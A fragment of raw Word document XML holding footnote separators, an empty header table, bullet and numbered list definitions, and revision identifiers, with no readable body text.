      <w:t>219911031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C42B8B" w14:textId="77777777" w:rsidR="00C926B3" w:rsidRDefault="00C926B3" w:rsidP="003C1D22">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7F984648" w14:textId="77777777" w:rsidR="00C926B3" w:rsidRDefault="00C926B3" w:rsidP="003C1D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A5B0499" w14:paraId="00169DB3" w14:textId="77777777" w:rsidTr="6A5B0499">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="17A7A332" w14:textId="352A5245" w:rsidR="6A5B0499" w:rsidRDefault="6A5B0499" w:rsidP="6A5B0499">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="2977D864" w14:textId="2AA4425C" w:rsidR="6A5B0499" w:rsidRDefault="6A5B0499" w:rsidP="6A5B0499">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="6FB2B335" w14:textId="1ACCBA55" w:rsidR="6A5B0499" w:rsidRDefault="6A5B0499" w:rsidP="6A5B0499">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="3D78B9E2" w14:textId="55608C7F" w:rsidR="6A5B0499" w:rsidRDefault="6A5B0499" w:rsidP="6A5B04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F22BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48601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951202"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="44049FC6"/>
    <w:lvl w:ilvl="0" w:tplc="15C6CD5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1E9CAD44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B9964522">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7E0883A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="93907560">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="610EAF24">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="658059E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="537C19EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FAF4268A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E4183B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="040A722C"/>
    <w:lvl w:ilvl="0" w:tplc="9E72E1F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="69AED946">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D264D0C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9ABE08D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5C5CBAB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C64E1086">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2E9EAF7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B986D4A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E0E65382">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E496C51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C09A6014"/>
    <w:lvl w:ilvl="0" w:tplc="4D3A158E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2BC44E96">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="597A2024">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8258EBDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C212D8B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AD32C648">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5FBC1EA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3EFE078A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BBDA3DC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2C3D6A90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4EE88516"/>
    <w:lvl w:ilvl="0" w:tplc="D3D2A1B6">
      <w:start w:val="5"/>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131B14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F51832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4BF851"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7D2A47A"/>
    <w:lvl w:ilvl="0" w:tplc="65F6F86E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="16DA2F20">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3232EFE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="77FA0D42">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E49E38E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DCCC30A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EE70D4E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7256B9C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="96D4BA98">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="51CD37B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78FCDC8A"/>
    <w:lvl w:ilvl="0" w:tplc="519EA1E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C01CA372">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B66AB56E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B41E6AE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E56E5046">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="208E3728">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5EB6C384">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0FD245BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DB9C7758">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="61CB7E46"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="443ABB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C03F34F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="670A711E"/>
    <w:lvl w:ilvl="0" w:tplc="FBA0F2F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F1CE0F96">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="74B8355C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5396026E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B6849CFA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CA407136">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A4FE2B0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="8582316E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BBA069FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1317954275">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="659428319">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1133979975">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1875537800">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="564412484">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="850485199">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2006393143">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1519662352">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1346057132">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="13208861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F39"/>
    <w:rsid w:val="000118F8"/>
    <w:rsid w:val="00033640"/>
    <w:rsid w:val="00033FCC"/>
    <w:rsid w:val="000603E0"/>
    <w:rsid w:val="00061196"/>
    <w:rsid w:val="000678C3"/>
    <w:rsid w:val="000D2815"/>
    <w:rsid w:val="00121486"/>
    <w:rsid w:val="00123DCA"/>
    <w:rsid w:val="001334A6"/>
    <w:rsid w:val="001435BC"/>
    <w:rsid w:val="00145656"/>
    <w:rsid w:val="00163836"/>
    <w:rsid w:val="001B017B"/>
    <w:rsid w:val="001D2509"/>
    <w:rsid w:val="001D6DB2"/>
    <w:rsid w:val="001F288C"/>
    <w:rsid w:val="001F4D68"/>
    <w:rsid w:val="001F5071"/>
    <w:rsid w:val="00220EBA"/>
    <w:rsid w:val="00236359"/>
    <w:rsid w:val="00273928"/>
    <w:rsid w:val="002F632A"/>
    <w:rsid w:val="00317BD5"/>
    <w:rsid w:val="003344AB"/>
    <w:rsid w:val="003B4C98"/>
    <w:rsid w:val="003C1D22"/>
    <w:rsid w:val="00442EDA"/>
    <w:rsid w:val="004452AF"/>
    <w:rsid w:val="00497A8C"/>
    <w:rsid w:val="004A26B6"/>
    <w:rsid w:val="00510D8F"/>
    <w:rsid w:val="00513C59"/>
    <w:rsid w:val="00513E5F"/>
    <w:rsid w:val="00542F3A"/>
    <w:rsid w:val="00584B92"/>
    <w:rsid w:val="005A5CEF"/>
    <w:rsid w:val="005B3B2E"/>
    <w:rsid w:val="00603428"/>
    <w:rsid w:val="00613B38"/>
    <w:rsid w:val="006253D6"/>
    <w:rsid w:val="00626011"/>
    <w:rsid w:val="0063180D"/>
    <w:rsid w:val="006614E2"/>
    <w:rsid w:val="006626E8"/>
    <w:rsid w:val="006A31F2"/>
    <w:rsid w:val="006A5F39"/>
    <w:rsid w:val="006D1B38"/>
    <w:rsid w:val="0070336B"/>
    <w:rsid w:val="0071459E"/>
    <w:rsid w:val="0071773C"/>
    <w:rsid w:val="007221D3"/>
    <w:rsid w:val="00725C99"/>
    <w:rsid w:val="007356F4"/>
    <w:rsid w:val="00770E6C"/>
    <w:rsid w:val="00782E20"/>
    <w:rsid w:val="007A3BB1"/>
    <w:rsid w:val="008E2367"/>
    <w:rsid w:val="00930EBB"/>
    <w:rsid w:val="00967ADE"/>
    <w:rsid w:val="009D41A8"/>
    <w:rsid w:val="00A2771F"/>
    <w:rsid w:val="00A343C2"/>
    <w:rsid w:val="00A34A3C"/>
    <w:rsid w:val="00A504C3"/>
    <w:rsid w:val="00A56A4D"/>
    <w:rsid w:val="00AF5827"/>
    <w:rsid w:val="00B02A48"/>
    <w:rsid w:val="00B0390B"/>
    <w:rsid w:val="00B16481"/>
    <w:rsid w:val="00B85BEC"/>
    <w:rsid w:val="00BA7318"/>
    <w:rsid w:val="00BD4923"/>
    <w:rsid w:val="00BD6154"/>
    <w:rsid w:val="00C01F8B"/>
    <w:rsid w:val="00C31EB9"/>
    <w:rsid w:val="00C55D51"/>
    <w:rsid w:val="00C70ED3"/>
    <w:rsid w:val="00C926B3"/>
    <w:rsid w:val="00CF4F9F"/>
    <w:rsid w:val="00CF78EE"/>
    <w:rsid w:val="00D133FE"/>
    <w:rsid w:val="00D2185C"/>
    <w:rsid w:val="00D8472F"/>
    <w:rsid w:val="00D86EF9"/>
    <w:rsid w:val="00D907F9"/>
    <w:rsid w:val="00DB3C26"/>
    <w:rsid w:val="00DC004E"/>
    <w:rsid w:val="00DD48B7"/>
    <w:rsid w:val="00DF79E7"/>
    <w:rsid w:val="00E2290A"/>
    <w:rsid w:val="00E3517A"/>
    <w:rsid w:val="00E459DB"/>
